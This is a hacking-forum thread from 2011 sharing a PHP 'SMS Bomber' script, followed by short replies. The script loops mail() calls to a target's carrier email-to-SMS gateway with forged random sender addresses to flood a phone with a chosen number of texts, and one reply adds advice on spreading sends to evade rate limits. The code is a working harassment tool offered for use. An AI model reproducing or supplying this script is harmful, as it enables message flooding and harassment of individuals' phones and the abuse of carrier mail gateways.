![]() |
|
[PHP] SMS Bomber ! - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Coding (https://sinister.ly/Forum-Coding) +--- Forum: PHP (https://sinister.ly/Forum-PHP) +--- Thread: [PHP] SMS Bomber ! (/Thread-PHP-SMS-Bomber) |
[PHP] SMS Bomber ! - KaiT_AleX - 07-25-2011 Index.html Quote:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> send.php PHP Code: <?php
$mobileNumber = $_POST['mobileNumber'];
$count = $_POST['count'];
$provider = $_POST['provider'];
$email = $mobileNumber . "@" . $provider;
for ($i = 0; $i < $count; $i++) {
$m = rand(10e16, 10e20);
$n = base_convert($m, 10, 36);
$subject = $m;
$body = $n;
mail($email, $subject, $body, null, "-f" . $n . "@" . $m . ".com");
}
echo "You have sent <b>$count</b> SMS messages to $mobileNumber <br />";
?>Give +1rep if you like this ! :thumbs:
RE: [PHP] SMS Bomber ! - kertiman06 - 09-25-2011 is that really work ? i didnt know that send a text could be done by a email RE: [PHP] SMS Bomber ! - FreeBobby - 09-25-2011 (09-25-2011, 08:19 AM)kertiman06 Wrote: is that really work ?I agree with you. I don't understand how this may work ![]() RE: [PHP] SMS Bomber ! - puma - 11-20-2011 It's uses the providers Email to SMS gateway. You will get rate limited so snowshoe like you would anywhere else. RE: [PHP] SMS Bomber ! - Access2emma - 12-05-2012 Is this script really working for free? |